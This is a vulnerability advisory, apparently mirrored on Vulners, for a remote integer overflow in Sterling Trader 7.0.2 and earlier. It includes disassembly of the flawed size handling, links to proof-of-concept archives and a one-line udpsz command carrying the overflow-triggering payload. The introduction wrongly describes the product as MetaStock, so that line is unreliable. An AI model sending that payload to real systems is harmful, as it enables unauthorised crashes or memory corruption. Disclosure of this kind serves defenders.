Vulners
Lucene search
Sterling Trader <= 7.0.2 Integer Overflow
#######################################################################
Luigi Auriemma
Application: Sterling Trader
http://www.sterlingtrader.com/Trading_Platforms/trading_platforms2.html
Versions: <= 7.0.2
Platforms: Windows
Bug: integer overflow
Exploitation: remote
Date: 25 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
MetaStock is the most used and awarded software for performing
technical analysis of stocks, futures, forex, commodities, indices and
other financial instruments.
#######################################################################
======
2) Bug
======
When this program is running (Base.exe or Elite.exe) it listens on the
first available TCP port which changes each time and it's affected by an
integer overflow vulnerability:
004922E3 > 83BF BC001000 10 CMP DWORD PTR DS:[EDI+1000BC],10
004922EA . 0F8C 66010000 JL Elite.00492456
004922F0 . 8D46 0C LEA EAX,DWORD PTR DS:[ESI+C]
004922F3 . 50 PUSH EAX ; &num2
004922F4 . 8D6E 08 LEA EBP,DWORD PTR DS:[ESI+8]
004922F7 . 55 PUSH EBP ; &num1 (size)
004922F8 . 68 9C23A000 PUSH Elite.00A0239C ; "1=%d~2=%d~"
004922FD . 53 PUSH EBX
004922FE . E8 7CA44600 CALL Elite.008FC77F ; sscanf
00492303 . 83C4 10 ADD ESP,10
00492306 . 83F8 02 CMP EAX,2
00492309 . 0F85 4D010000 JNZ Elite.0049245C
0049230F . 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
00492312 . 83C2 10 ADD EDX,10 ; size + 0x10
00492315 . B9 31000000 MOV ECX,31
0049231A . 66:898E 84000000 MOV WORD PTR DS:[ESI+84],CX
00492321 . 8956 04 MOV DWORD PTR DS:[ESI+4],EDX
00492324 . C746 70 10000000 MOV DWORD PTR DS:[ESI+70],10
0049232B . 33ED XOR EBP,EBP
0049232D > 8B87 BC001000 MOV EAX,DWORD PTR DS:[EDI+1000BC]
00492333 . 3B46 04 CMP EAX,DWORD PTR DS:[ESI+4]
00492336 . 0F8C 3E010000 JL Elite.0049247A
0049233C . 89AF C0001000 MOV DWORD PTR DS:[EDI+1000C0],EBP
00492342 . 8B4E 04 MOV ECX,DWORD PTR DS:[ESI+4]
00492345 . 41 INC ECX ; size + 1
00492346 . 51 PUSH ECX
00492347 . E8 C0673F00 CALL Elite.00888B0C ; malloc()
0049234C . 8B56 04 MOV EDX,DWORD PTR DS:[ESI+4]
0049234F . 52 PUSH EDX
00492350 . 53 PUSH EBX
00492351 . 50 PUSH EAX
00492352 . 8946 6C MOV DWORD PTR DS:[ESI+6C],EAX
00492355 . E8 36774600 CALL Elite.008F9A90 ; memcpy
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17889.zip
udpsz -b a -T -c "1=4294967279~2=0~" SERVER PORT 0xffff
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1